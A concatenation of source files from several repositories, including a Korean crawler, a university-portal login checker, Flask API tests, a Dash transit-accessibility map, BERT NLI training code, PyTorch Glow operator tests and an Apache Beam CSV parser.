img = 1
else:
if img.startswith("http://") or img.startswith("https://"): # img가 내부링크인지 외부 링크인지 판단.
pass
elif img.startswith("//"):
img = "http:" + img
else:
img = domain + img
except:
img = 1
if img != 1:
if img_size(img):
pass
else:
img = 1
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = phrase.lower()
post_data['img'] = img
post_data['url'] = url
print(date, "::::", title)
#게시물의 날짜가 end_date 보다 옛날 글이면 continue, 최신 글이면 append
if str(date) <= end_date:
continue
else:
post_data_prepare.append(post_data)
return post_data_prepare
#url을 받으면 Page를 변환시켜서, 변환된 url 반환
def Change_page(url, page):
url_done = url + str(page)
return url_done
#입력된 url의 도메인 url 반환
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] #도메인 url 추출
return domain
```
#### File: modules/SJ_Auth/sj_auth.py
```python
import requests
from bs4 import BeautifulSoup as bs
import getpass
header = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5)\
AppleWebKit 537.36 (KHTML, like Gecko) Chrome",
"Accept":"text/html,application/xhtml+xml,application/xml;\
q=0.9,imgwebp,*/*;q=0.8"}
do_url = "https://do.sejong.ac.kr/ko/process/member/login"
TIMEOUT_SEC = 3
def sjlms_api(id, pw):
data = {"username":id, "password":pw, "rememberusername":"1"}
with requests.Session() as s:
page = s.post("http://sjulms.moodler.kr/login/index.php",
headers = header, data = data, timeout=TIMEOUT_SEC)
soup = bs(page.text, "html.parser")
if soup.find("h4") is None:
return {"result":False}
else:
name = soup.find("h4").get_text()
major = soup.find("p",{"class":"department"}).get_text()
return {
"result":True,
"name":name,
"id":id,
"major":major
}
def dosejong_api(id, pw):
data = {
#POST
"email":id,
"password":pw
}
with requests.Session() as s:
html = s.post(do_url, headers = header, data = data, timeout=TIMEOUT_SEC).content
html = s.get("https://do.sejong.ac.kr/", timeout=TIMEOUT_SEC).text
soup = bs(html, "html.parser")
soup = soup.select("div.info")
if soup == []: return {"result": False}
name = soup[0].find("b").get_text().strip()
major = soup[0].find("small").get_text().strip().split(" ")[1]
return {
"result":True,
"name":name,
"id":id,
"major":major
}
def uis_api(id, pw):
uis_header = {
"Referer": "https://portal.sejong.ac.kr",
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0"
}
LOGIN_INFO = {
'id': id,
'password': pw,
'rtUrl': '',
}
with requests.Session() as s:
login_req = s.post('https://portal.sejong.ac.kr/jsp/login/login_action.jsp',
headers=uis_header, data=LOGIN_INFO, timeout=TIMEOUT_SEC)
res = s.get('http://uis.sejong.ac.kr/app/sys.Login.servj', timeout=TIMEOUT_SEC)
res = s.get('http://uis.sejong.ac.kr/app/menu/sys.MenuSys.doj', timeout=TIMEOUT_SEC)
soup = bs(res.content, 'html.parser')
name = soup.select_one('form[name="MainForm"] table tr td strong')
if name is None: return {"result":False}
name = name.get_text().replace(" ", "").replace("님", "").replace("\n", "").replace("\r","")
return {
"result":True,
"name":name,
"id":id,
"major":"none"
}
if __name__ == '__main__':
id = input("학교 아이디: ")
pw = getpass.getpass("비밀번호: ")
print(dosejong_api(id,pw))
print(sjlms_api(id,pw))
print(uis_api(id, pw))
```
#### File: SIGNUS/tests/test_management.py
```python
import unittest
from json import loads
from flask import current_app
from app import create_app
from flask_jwt_extended import create_access_token
class ManagementAPITestCase(unittest.TestCase):
'''Management 테스트 케이스 클래스'''
def setUp(self):
'''전처리 메소드'''
self.app = create_app('testing')
self.app_context = self.app.app_context()
self.app_context.push()
self.client = self.app.test_client()
self.access_token = {
'ADMIN': create_access_token(
identity=self.app.config['ADMIN_ID'],
expires_delta=False),
'TEST': create_access_token(
identity="test",
expires_delta=False)}
def tearDown(self):
'''후처리 메소드'''
self.app_context.pop()
def get_headers(self, user_type="ADMIN"):
'''API Header 생성 메소드'''
result = {
'Accept': 'application/json',
'Authorization': "Bearer " + self.access_token[user_type],
#'Content-Type': 'application/json',
}
return result
def test_realtime(self):
'''실시간 검색어'''
resp = self.client.get(
'/api/signus/v1/realtime',
headers=self.get_headers(),
json={}
)
self.assertEqual(resp.status_code, 200)
def test_put_notice(self):
'''공지 작성 API 검증 테스트'''
resp = self.client.put(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={
"title": "공지사항 테스트",
"post": "공지사항 테스트"
}
)
self.assertEqual(resp.status_code, 200)
def test_patch_notice(self):
'''공지 수정 API 검증 테스트'''
# 공지 추가
resp = self.client.put(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={
"title": "공지사항 테스트",
"post": "공지사항 테스트"
}
)
# 공지 전체 반환
resp = self.client.get(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={}
)
notices = loads(loads(resp.data)['result'])
notice_obi = notices[0]['_id']['$oid']
# 공지 수정
resp = self.client.patch(
'/api/signus/v1/notice/' + notice_obi,
headers=self.get_headers(),
json={
"title": "공지사항 수정 테스트",
"post": "공지사항 수정 테스트"
}
)
self.assertEqual(resp.status_code, 200)
def test_notice_many(self):
'''공지 전체 반환 API 검증 테스트'''
resp = self.client.get(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={}
)
self.assertEqual(resp.status_code, 200)
def test_notice_one(self):
'''공지 단일 반환 API 검증 테스트'''
# 공지 추가
resp = self.client.put(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={
"title": "공지사항 테스트",
"post": "공지사항 테스트"
}
)
# 공지 전체 반환
resp = self.client.get(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={}
)
notices = loads(loads(resp.data)['result'])
notice_obi = notices[0]['_id']['$oid']
# 공지 단일 반환
resp = self.client.get(
'/api/signus/v1/notice/' + notice_obi,
headers=self.get_headers(),
json={}
)
self.assertEqual(resp.status_code, 200)
def test_z_delete_notice(self):
'''공지사항 삭제 API 검증 테스트'''
# 공지 추가
resp = self.client.put(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={
"title": "공지사항 테스트",
"post": "공지사항 테스트"
}
)
# 공지 전체 반환
resp = self.client.get(
'/api/signus/v1/notice',
headers=self.get_headers(),
json={}
)
notices = loads(loads(resp.data)['result'])
# 공지 삭제
for notice in notices:
resp = self.client.delete(
'/api/signus/v1/notice/' + notice['_id']['$oid'],
headers=self.get_headers(),
json={}
)
self.assertEqual(resp.status_code, 200)
``` |
{
"source": "83qmhn/transit_deprivation",
"score": 2
} |
#### File: transit_deprivation/app/app.py
```python
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from plotly import graph_objs as go
from plotly.graph_objs import *
from plotly.subplots import make_subplots
import shapefile
import numpy as np
import json
import time
import pickle
app = dash.Dash(
__name__, meta_tags=[{"name": "viewport", "content": "width=device-width"}]
)
server = app.server
# Plotly mapbox public token
mapbox_access_token = "<KEY>"
# load data
print(f"Loading data ...")
t_total_start = time.time()
# load shapefile points
t_start = time.time()
points = shapefile.Reader("data/akl_points.shp")
print(f" -- loaded shapefile with {len(points.records())} points ({time.time() - t_start:.3f} s)")
# load ploy geojson
with open("data/akl_polygons_id.geojson") as f:
t_start = time.time()
polys = json.load(f)
print(f" -- loaded polygon geojson ({time.time() - t_start:.3f} s)")
# load precomputed odt
with open("data/akl_odt.npy", 'rb') as f:
t_start = time.time()
odt = np.load(f)
print(f" -- loaded odt cube with dimensions {odt.shape} ({time.time() - t_start:.3f} s)")
# load location index
with open("data/akl_loc_idx.pkl", 'rb') as f:
t_start = time.time()
loc_idx = pickle.load(f) # mapping from DataZone2018 field to point array index
idx_loc = {v:k for k, v in loc_idx.items()} # mapping from point index to DataZone2018
print(f" -- loaded location index with dimension {len(loc_idx)} ({time.time() - t_start:.3f} s)")
# load time index
with open("data/akl_t_idx.pkl", 'rb') as f:
t_start = time.time()
t_idx = pickle.load(f)
idx_t = {v: k for k, v in t_idx.items()} # mapping from t index to travel time
print(f" -- loaded time index with dimension {len(t_idx)} ({time.time() - t_start:.3f} s)")
print(f" -- total time: {time.time() - t_total_start:.3f} s")
# extract lat lon from points
locations_lon, locations_lat = zip(*[p.points[0] for p in points.shapes()])
regions = {"auckland": (-36.8485, 174.7633)} # lat lon
# ui defaults
ui_defaults = dict(
selection_map_opacity=0.2,
selection_map_zoom=12,
route_map_opacity=1.0,
mapbox_style="carto-positron"
)
def is_valid(a):
return np.logical_not(np.isnan(a))
def travel_time_accessibility(origin, cube, limit):
options = cube[origin, ...] # vertical plane through cube
valid = is_valid(options)
# set time budget for each option
t_budget = limit # minutes
t_remain = np.zeros_like(options)
t_remain[valid] = t_budget
# travel from origin to destination
t_remain[valid] -= options[valid]
t_remain[t_remain < 0] = 0
# data dims
n_loc, n_t = t_remain.shape
# mean eta for each location at least one route that meets the constraints
valid_loc = np.max(t_remain, axis=-1) > 0
etas = np.nanmean(options[valid_loc], axis=-1)
acc_idx = [i for i, v in enumerate(valid_loc) if v]
# proportion of time each destination is accessible from this location within the time limit
acc_t_by_loc = np.nansum(t_remain[acc_idx] > 0, axis=1) / n_t
return acc_idx, etas, acc_t_by_loc
def selection_map(relayoutData):
opacity = ui_defaults["selection_map_opacity"]
locations = [f["id"] for f in polys["features"]]
values = [0.75] * len(locations)
try:
lat = (relayoutData['mapbox.center']['lat'])
lon = (relayoutData['mapbox.center']['lon'])
zoom = (relayoutData['mapbox.zoom'])
except:
lat, lon = regions["auckland"]
zoom=ui_defaults["selection_map_zoom"]
data = [
Choroplethmapbox(
geojson=polys,
featureidkey="id",
locations=locations,
z=values,
colorscale="Greys",
showscale=False,
marker=dict(opacity=opacity, line=dict(width=0.1)),
),
]
layout = dict(
mapbox=dict(
layers=[],
accesstoken=mapbox_access_token,
center=dict(lat=lat, lon=lon),
zoom=zoom,
style=ui_defaults["mapbox_style"]
),
hovermode="closest",
margin=dict(r=0, l=0, t=0, b=0),
dragmode="pan",
clickmode="event+select"
)
return dict(data=data, layout=layout)
def route_map(origin_idx, locations, values, opacity, relayoutData):
try:
lat = (relayoutData['mapbox.center']['lat'])
lon = (relayoutData['mapbox.center']['lon'])
zoom = (relayoutData['mapbox.zoom'])
except:
lat, lon = locations_lat[origin_idx], locations_lon[origin_idx]
zoom = ui_defaults["selection_map_zoom"]
locations = [idx_loc[l] for l in locations]
data = [
Choroplethmapbox(
geojson=polys,
featureidkey="id",
locations=locations,
z=values,
colorscale="Viridis",
showscale=True,
colorbar=dict(
title="Mean ETA",
xpad=15,
yanchor="middle",
y=0.775,
tickmode="linear",
dtick=10,
tick0=0,
tickfont=dict(color="#000000"),
titlefont=dict(color="#000000"),
thicknessmode="pixels",
len=0.4
),
marker=dict(opacity=opacity, line=dict(width=0.0)),
),
]
layout = dict(
mapbox=dict(
layers=[],
accesstoken=mapbox_access_token,
center=dict(lat=lat, lon=lon),
zoom=zoom,
style=ui_defaults["mapbox_style"]
),
hovermode="closest",
margin=dict(r=0, l=0, t=0, b=0),
dragmode="pan",
clickmode="event",
autosize=True
)
return dict(data=data, layout=layout)
# Layout of Dash App
app.layout = html.Div(
children=[
html.Div(
className="row",
children=[
# Column for user controls
html.Div(
className="four columns div-user-controls",
children=[
html.Img(className="logo", src=app.get_asset_url("dash-logo-new.png")),
html.H2("Transit & Deprivation"),
html.P("Select a starting location from the map"),
html.P(id="selected-point"),
html.Div(
id="time-limit-slider-container",
children=[
html.P(
id="time-limit-slider-text",
children="Drag the slider to change the available travel time in minutes",
),
dcc.Slider(
id="time-limit-slider",
min=1,
max=240,
step=1,
value=60,
marks={
str(t): {
"label": str(t),
"style": {"color": "#7fafdf"},
}
for t in [1, 60, 120, 180, 240]
},
updatemode='mouseup',
),
html.Div(
style={"margin-top": 10},
children=[
html.P(id="time-limit-value")
]
),
],
),
],
),
html.Div(
id="plot-container",
className="eight columns div-for-charts bg-grey",
children=[
dcc.Loading(
type="default",
children=[
html.Div(
id="map-container",
children=[
dcc.Graph(
id="map-graph",
className="single-plot",
figure=selection_map(None)
),
]
),
]
),
],
)
],
)
]
)
# callbacks should be defined after app.layout
@app.callback(
Output("time-limit-value", "children"), [Input("time-limit-slider", "value")]
)
def update_time_limit_value(value):
value_text = f"Available time: {value} minutes"
return value_text
@app.callback(
Output("map-graph", "selectedData"), [Input("map-container", "n_clicks")]
)
def reset_selectedData(n_clicks):
return None
@app.callback(
[
Output("selected-point", "children"),
Output("map-graph", "figure"),
],
[
Input("map-graph", "selectedData"),
Input("time-limit-slider", "value"),
],
[
State("map-graph", "relayoutData")
]
)
def select_point(selectedData, time_limit, relayoutData):
if selectedData:
origin = selectedData["points"][0]["location"]
origin_idx = loc_idx[origin]
locations, values, opacity = travel_time_accessibility(origin_idx, odt, time_limit)
figure = go.Figure(route_map(origin_idx, locations, values, opacity, relayoutData))
selected_text = f"Selected location: {origin}"
else:
figure = go.Figure(selection_map(relayoutData))
selected_text = f"Selected location: None"
return selected_text, figure
if __name__ == "__main__":
app.run_server(host="0.0.0.0", debug=True)
``` |
{
"source": "83r7y/torch-berty",
"score": 2
} |
#### File: pytorch_berty/models/bert_klue_nli.py
```python
import numpy as np
import torch
from torch import optim
from transformers import BertTokenizer, BertModel, BertConfig
from ..core import BaseModel
class BertKlueNli(torch.nn.Module, BaseModel):
def __init__(self, config, dataset):
super(BertKlueNli, self).__init__()
self.config = config
self.dataset = dataset
self.num_classes = len(set(self.dataset.klue_nli_ds['train']['label']))
self.bert_cfg = BertConfig.from_pretrained('klue/bert-base')
self.bert = BertModel.from_pretrained('klue/bert-base')
self.tk = BertTokenizer.from_pretrained('klue/bert-base', config=self.bert_cfg)
self.logit_fc = torch.nn.Linear(self.bert_cfg.hidden_size, self.num_classes)
self.loss = torch.nn.CrossEntropyLoss()
if 'model_ckpt' in self.config:
ckpt = torch.load(self.config['model_ckpt'])
self.load_state_dict(ckpt['state_dict'])
self.eval()
def forward(self, batch:dict):
batch = self.preprocess(batch)
bert_out = self.bert(input_ids=batch['input_ids'],
token_type_ids=batch['token_type_ids'],
attention_mask=batch['attention_mask'])
pooled_out = bert_out['pooler_output']
logits = self.logit_fc(pooled_out)
return logits
def preprocess(self, batch:dict):
# get device of model
device = next(self.parameters()).device
if 'label' in batch:
batch['label'] = batch['label'].to(device)
# tokenize sentences
tk_res = self.tk(text=batch['premise'], text_pair=batch['hypothesis'],
padding=True, return_tensors='pt',
max_length=self.bert_cfg.max_position_embeddings)
for key in tk_res:
batch[key] = tk_res[key].to(device)
return batch
def predict(self, summary:str, full:str):
# make text as batch
batch = dict(summary=[summary],
full=[full])
logits = self.forward(batch)
# multilabel intent classification
return logits
def training_step(self, batch:dict, batch_idx:int, opt_idx:int):
logits = self.forward(batch)
loss = self.loss(logits, batch['label'])
return loss
def validation_step(self, batch:dict, batch_idx:int):
logits = self.forward(batch)
loss = self.loss(logits, batch['label'])
return loss
def test_step(self, batch:dict, batch_idx:int):
logits = self.forward(batch)
loss = self.loss(logits, batch['label'])
return loss
def configure_optimizers(self):
opt = optim.Adam(self.parameters(), lr=self.config['trainer']['learning_rate'])
scheduler = optim.lr_scheduler.ExponentialLR(opt, 0.9)
return [opt], [scheduler]
```
#### File: torch-berty/pytorch_berty/trainer.py
```python
import random
import os
import argparse
import json
from pathlib import Path
from tqdm import tqdm
import torch
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data.distributed import DistributedSampler
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.utils.data import DataLoader
import numpy as np
from .core import BaseModel, BaseDataset
def training_prologue():
parser = argparse.ArgumentParser()
parser.add_argument('--cfg-path', required=True, help='path of config file')
args = parser.parse_args()
# load config
with open(args.cfg_path) as fp:
str_cfg = fp.read()
config = json.loads(str_cfg)
# set seed
torch.manual_seed(config['trainer']['seed'])
np.random.seed(config['trainer']['seed'])
random.seed(config['trainer']['seed'])
return config, parser
def make_output_dir(config, arg_parser):
args = arg_parser.parse_args()
# set output directory
# check if output dir exists
dir_idx = 0
while True:
try:
path = Path('%s/output_%d' % (config['output_dir'], dir_idx))
path.mkdir(parents=True, exist_ok=False)
break
except FileExistsError as err:
dir_idx += 1
config['output_dir'] = '%s/output_%d' % (config['output_dir'], dir_idx)
# copy config file
with open('%s/%s' % (config['output_dir'],
os.path.basename(args.cfg_path)), 'w') as fp:
fp.write(json.dumps(config, indent=4, ensure_ascii=False))
class Trainer:
def __init__(self, config, model, dataset):
self.config = config
self.model = model
self.dataset = dataset
def init_process(self, rank, size, fn, backend='nccl'):
cfg = self.config
os.environ['MASTER_ADDR'] = cfg['trainer']['master_addr']
os.environ['MASTER_PORT'] = cfg['trainer']['master_port']
print('rank: %d, size: %d' % (rank,size))
fn(rank, size)
def fit(self):
cfg = self.config
if cfg['trainer']['n_gpus'] > 1:
processes = list()
# distribute
for rank in range(cfg['trainer']['n_gpus']):
p = mp.Process(target=self.init_process,
args=(rank,
cfg['trainer']['n_gpus'],
self._run))
p.start()
processes.append(p)
for p in processes:
p.join()
else:
# single gpu or cpu training
self._run()
def average_gradients(self, model):
world_size = dist.get_world_size()
for param in model.parameters():
if param.grad is not None:
dist.all_reduce(param.grad, op=dist.reduce_op.SUM)
param.grad /= world_size
def _run(self, rank=None, size=None):
cfg = self.config
# check if dist training
dist_train = rank is not None and size is not None
if dist_train:
torch.cuda.set_device(rank)
device = torch.device('cuda', rank)
dist.init_process_group(backend='nccl',
init_method='env://',
world_size=size,
rank=rank)
else:
if cfg['trainer']['n_gpus'] == 0:
device = torch.device('cpu')
else:
# single gpu
device = torch.device('cuda', 0)
torch.manual_seed(cfg['trainer']['seed'])
np.random.seed(cfg['trainer']['seed'])
random.seed(cfg['trainer']['seed'])
if dist_train:
self.model.to(device)
ddp_model = DDP(self.model, device_ids=[rank], output_device=rank, find_unused_parameters=True)
model = ddp_model.module
train_dataset = self.dataset.dataset['train']
train_sampler = DistributedSampler(train_dataset)
train_data = DataLoader(train_dataset, sampler=train_sampler, batch_size=cfg['batch_size'])
else:
# get optimizer
self.model.to(device)
model = self.model
train_data = self.dataset.train
valid_data = self.dataset.valid
optimizers, schedulers = self.model.configure_optimizers()
# resume checkpoint
cnt_epoch = 0
if cfg['trainer']['resume_from_checkpoint']:
ckpt = torch.load(cfg['trainer']['resume_from_checkpoint'], map_location=device)
cnt_epoch = ckpt['epoch']
model.load_state_dict(ckpt['state_dict'])
for opt, opt_state, sch, sch_state in\
zip(optimizers, ckpt['optimizer_states'], schedulers, ckpt['lr_schedulers']):
opt.load_state_dict(opt_state)
if sch is not None:
sch.load_state_dict(sch_state)
best_loss = np.inf
for epoch in range(cnt_epoch, cfg['trainer']['max_epochs']):
model.train()
tqdm_ins = tqdm(train_data,
disable=(dist_train and rank != 0),
ascii=True,
desc='epoch: %d' % epoch)
for batch_idx, batch in enumerate(tqdm_ins):
for opt_idx, optimizer in zip(range(len(optimizers)), optimizers):
optimizer.zero_grad()
# training step
loss = model.training_step(batch, batch_idx, opt_idx)
tqdm_ins.set_postfix({'train_loss': '%7.4f' % loss})
loss.backward()
if dist_train:
self.average_gradients(model)
optimizer.step()
if dist_train:
dist.barrier()
if schedulers is not None:
for scheduler in schedulers:
scheduler.step()
model.eval()
if rank == 0 or not dist_train:
# compute avg loss
tot_loss = list()
for batch_idx, batch in enumerate(tqdm(valid_data, disable=(rank != 0))):
loss = model.validation_step(batch, batch_idx)
tot_loss.append(loss.item())
avg_loss = np.mean(np.array(tot_loss))
# save best checkpoint
if best_loss > avg_loss:
# save
save_dict = dict(
epoch=epoch,
optimizer_states=[optimizer.state_dict() for optimizer in optimizers],
state_dict = model.state_dict()
)
if schedulers is not None:
save_dict['lr_schedulers']=[scheduler.state_dict() for scheduler in schedulers]
model.save_user_specific_data(save_dict)
torch.save(save_dict, '%s/epoch=%02d-val_loss=%8.6f.ckpt' % (self.config['output_dir'],
epoch, avg_loss))
best_loss = avg_loss
print('%dth epoch, average validation loss: %7.4f, best_loss: %7.4f' %\
(epoch, avg_loss, best_loss))
if dist_train:
dist.barrier()
```
#### File: run/infer_fastspeech2/run.py
```python
import argparse
import json
import os
import random
import math
import numpy as np
import torch
from pytorch_berty.models.fastspeech2 import FastSpeech2
from pytorch_berty.utils.korean import KOR_SYMBOLS
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--cfg-path', required=True, help='path of config file')
args = parser.parse_args()
# load config
with open(args.cfg_path) as fp:
str_cfg = fp.read()
config = json.loads(str_cfg)
fastspeech2_model = FastSpeech2(config=config, dataset=None, symbols=KOR_SYMBOLS)
mel = fastspeech2_model.predict('안녕하세요')
if __name__ == '__main__':
main()
```
#### File: run/infer_wav2lip/run.py
```python
import argparse
import json
import os
import random
import math
import numpy as np
import torch
from pytorch_berty.models.conv_face_detection import ConvFaceDetection
from pytorch_berty.models.conv_wav2lip import ConvWav2Lip
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--cfg-path', required=True, help='path of config file')
args = parser.parse_args()
# load config
with open(args.cfg_path) as fp:
str_cfg = fp.read()
config = json.loads(str_cfg)
# init face detection model
# load model of https://www.adrianbulat.com/downloads/python-fan/s3fd-619a316812.pth
face_detection_model = ConvFaceDetection(config, None, config['face_detection_ckpt']).to(config['device'])
wav2lip_model = ConvWav2Lip(config, None, face_detection_model, config['wav2lip_ckpt']).to(config['device'])
video_bin = wav2lip_model.predict(config['video_path'], config['audio_path'])
with open(config['output_path'], 'wb') as fp:
fp.write(video_bin)
if __name__ == '__main__':
main()
``` |
{
"source": "840017951/test01",
"score": 3
} |
#### File: 840017951/test01/login.py
```python
from flask import Flask
app = Flask(__name__)
@app.route('/login', methods=['GET', 'POST'])
def login():
num1 = 10
num2 = 200
num3 = 30
return 'login page'
if __main__ == '__name__':
app.run()
``` |
{
"source": "842974287/glow",
"score": 2
} |
#### File: tests/nodes/gelu_test.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
import torch.nn.functional as F
from tests.utils import jitVsGlow
class TestGelu(unittest.TestCase):
def test_gelu_basic(self):
"""Basic test of the PyTorch gelu Node on Glow."""
def test_f(a):
return F.gelu(a + a)
for i in range(100):
x = torch.randn(10)
jitVsGlow(
test_f,
x,
check_trace=False,
atol=1e-3,
expected_fused_ops={"aten::gelu"},
)
```
#### File: tests/nodes/matmul_test.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import random
import unittest
import torch
from tests.utils import jitVsGlow
class TestMatMul(unittest.TestCase):
def test_matmul_1d_1d(self):
"""Test of aten::matmul with two 1d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_2d_1d(self):
"""Test of aten::matmul with 2d and 1d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(9, 4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_3d_1d(self):
"""Test of aten::matmul with 2d and 1d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(6, 9, 4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_4d_1d(self):
"""Test of aten::matmul with 2d and 1d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(2, 6, 9, 4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_1d_2d(self):
"""Test of aten::matmul with 1d and 2d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(4)
y = torch.randn(4, 9)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_1d_3d(self):
"""Test of aten::matmul with 1d and 2d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(4)
y = torch.randn(3, 4, 9)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_1d_4d(self):
"""Test of aten::matmul with 1d and 2d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
x = torch.randn(4)
y = torch.randn(5, 3, 4, 9)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::matmul"})
def test_matmul_nd_nd(self):
"""Test of aten::matmul with >2d and >2d inputs Glow."""
def test_f(a, b):
return a.matmul(b + b)
def do_test(lhsDims, rhsDims):
lhs = torch.randn(lhsDims)
rhs = torch.randn(rhsDims)
jitVsGlow(test_f, lhs, rhs, expected_fused_ops={"aten::matmul"})
def randomDimsOfRank(rank):
dims = []
for i in range(rank):
dim = random.randint(2, 9)
dims.append(dim)
return dims
# Dimensions of base tensors that lhs and rhs will be built from
lhsBase = [3, 4]
rhsBase = [4, 2]
for additional_dims in range(3):
extension = randomDimsOfRank(additional_dims)
do_test(extension + lhsBase, rhsBase)
do_test([1] + extension + lhsBase, rhsBase)
do_test(extension + [1] + lhsBase, rhsBase)
do_test(lhsBase, extension + rhsBase)
do_test(lhsBase, [1] + extension + rhsBase)
do_test(lhsBase, extension + [1] + rhsBase)
do_test(extension + lhsBase, extension + rhsBase)
```
#### File: tests/nodes/sub_test.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from tests.utils import jitVsGlow
class TestSub(unittest.TestCase):
def test_sub_basic(self):
"""Basic test of the PyTorch sub Node on Glow."""
def test_f(a, b):
c = a.sub(b)
return c.sub(c)
x = torch.randn(4)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::sub"})
def test_sub_broadcast_1(self):
"""Test of the PyTorch sub Node on Glow with broadcasting."""
def test_f(a, b):
c = a.sub(b)
return c.sub(c)
x = torch.randn(8, 3, 4, 2)
y = torch.randn(4, 2)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::sub"})
def test_sub_broadcast_2(self):
"""Test of the PyTorch sub Node on Glow with broadcasting."""
def test_f(a, b):
c = a.sub(b)
return c.sub(c)
x = torch.randn(8, 3, 4, 2)
y = torch.randn(1, 2)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::sub"})
def test_sub_broadcast_3(self):
"""Test of the PyTorch sub Node on Glow with broadcasting."""
def test_f(a, b):
c = a.sub(b)
return c.sub(c)
x = torch.randn(4, 2)
y = torch.randn(8, 3, 4, 2)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::sub"})
def test_sub_float(self):
"""Test of the PyTorch aten::sub Node with a float argument"""
def test_f(a):
return (a * a).sub(3.9)
x = torch.randn(4)
jitVsGlow(test_f, x, expected_fused_ops={"aten::sub"})
def test_sub_int(self):
"""Test of the PyTorch aten::sub Node with an int argument"""
def test_f(a):
return (a * a).sub(20)
x = torch.randn(4)
jitVsGlow(test_f, x, expected_fused_ops={"aten::sub"})
```
#### File: tests/nodes/typeas_test.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
from tests.utils import jitVsGlow
class TestTypeAs(unittest.TestCase):
def test_typeas_basic(self):
"""Basic test of the PyTorch type_as Node on Glow (float to int32)."""
def test_f(a, b):
c = a.type_as(b)
return c + c
x = torch.randn(4)
y = torch.zeros(4, dtype=torch.int32)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::type_as"})
def test_typeas_basic2(self):
"""Basic test of the PyTorch type_as Node on Glow (int32 to float)."""
def test_f(a, b):
c = a.type_as(b)
return c + c
x = torch.randn(4).to(dtype=torch.int32)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::type_as"})
def test_typeas_bool(self):
"""Test of the PyTorch type_as Node on Glow converting bool to float."""
def test_f(a, b):
c = a.type_as(b)
return c + c
x = torch.randn(4).to(dtype=torch.bool)
y = torch.randn(4)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::type_as"})
def test_typeas_self(self):
"""Test of the PyTorch mul Node on Glow doing empty convert (float to float)."""
def test_f(a, b):
a = a + a
c = a.type_as(b)
return c + c
x = torch.randn(4)
y = x
jitVsGlow(test_f, x, y, expected_fused_ops={})
def test_typeas_self_f2f2(self):
"""Test of the PyTorch type_as Node on Glow float to float."""
def test_f(a, b):
a = a + a
c = a.type_as(b)
return c + c
x = torch.randn(4, 2)
y = torch.randn(8, 3, 4, 2)
jitVsGlow(test_f, x, y, expected_fused_ops={})
def test_typeas_self_f2i2(self):
"""Test of the PyTorch type_as Node on Glow with float to int32"""
def test_f(a, b):
a = a + a
c = a.type_as(b)
return c + c
x = torch.randn(4, 2)
y = torch.randn(8, 3, 4, 2).to(dtype=torch.int32)
jitVsGlow(test_f, x, y, expected_fused_ops={"aten::type_as"})
``` |
{
"source": "843098306/ETL-Data-Pipeline",
"score": 2
} |
#### File: 843098306/ETL-Data-Pipeline/datatype_reference.py
```python
from __future__ import absolute_import
from __future__ import print_function
import h5py
import argparse
import logging
import re
import numpy as np
import pandas as pd
import os
import apache_beam as beam
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.metrics import Metrics
from apache_beam.metrics.metric import MetricsFilter
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
import tensorflow as tf
import tensorflow_transform as tft
import tensorflow_transform.beam as tft_beam
import keras
from keras import models, layers
from kerastuner import HyperModel
from kerastuner.tuners import Hyperband
from sklearn import preprocessing
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
class Split(beam.DoFn):
def process(self, element, header_array):
Feature_list_raw = element.split(",")
Feature_list = []
# Edge case
# i = 0
# while(i < len(Feature_list_raw)):
# if(i == 2):
# Feature_list.append(str(Feature_list_raw[i] + Feature_list_raw[i + 1]))
# i += 2
# else:
# Feature_list.append(Feature_list_raw[i])
# i += 1
Output = {}
for j in range(len(header_array)):
if(Feature_list_raw[j] == "" or Feature_list_raw[j] == " "):
Output[header_array[j]] = "?"
else:
Output[header_array[j]] = Feature_list_raw[j]
return [Output]
